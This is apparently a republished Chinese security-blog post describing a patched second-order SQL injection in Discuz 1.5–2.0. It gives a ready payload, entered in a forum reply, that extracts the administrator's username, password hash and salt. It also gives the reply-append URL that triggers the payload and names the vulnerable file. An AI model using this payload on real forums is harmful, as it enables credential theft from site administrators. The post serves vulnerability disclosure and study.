频道栏目
首页 > 安全 > 网站安全 > 正文

Discuz 1.5 - 2.0 二次注入细节(已出补丁)

2011-08-20 09:12:42           
收藏   我要投稿

By:jannock

今天才发现,discuz 昨天又出补丁了。唉,又少一个玩了。这里说一下细节让大家共同学习一下吧。

在发表回复的地方输入注入语句:

a',`subject`=(/*!select*/ concat(username,'|',password,'|',salt) from pre_ucenter_members where uid=1 limit 0,1),comment='

然后到回复补充那里随便补充一下,注入语句就被执行。

补充的地址:www.2cto.com

forum.php?mod=misc&tid={tid}&action=postappend&pid={pid}

上面的语句就会把取得的内容写进回复主题返回。

漏洞文件:

source\module\forum\forum_misc.php

 

asp?http://hiphotos.baidu.com/hackerrose/pic/item/742cc401afe73f6479ec2c6d.jpg" target="_blank">

相关TAG标签 补丁 细节
上一篇:Http指纹识别技术
下一篇:discuz sessoin hijack tips 续
相关文章
图文推荐
热门新闻

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站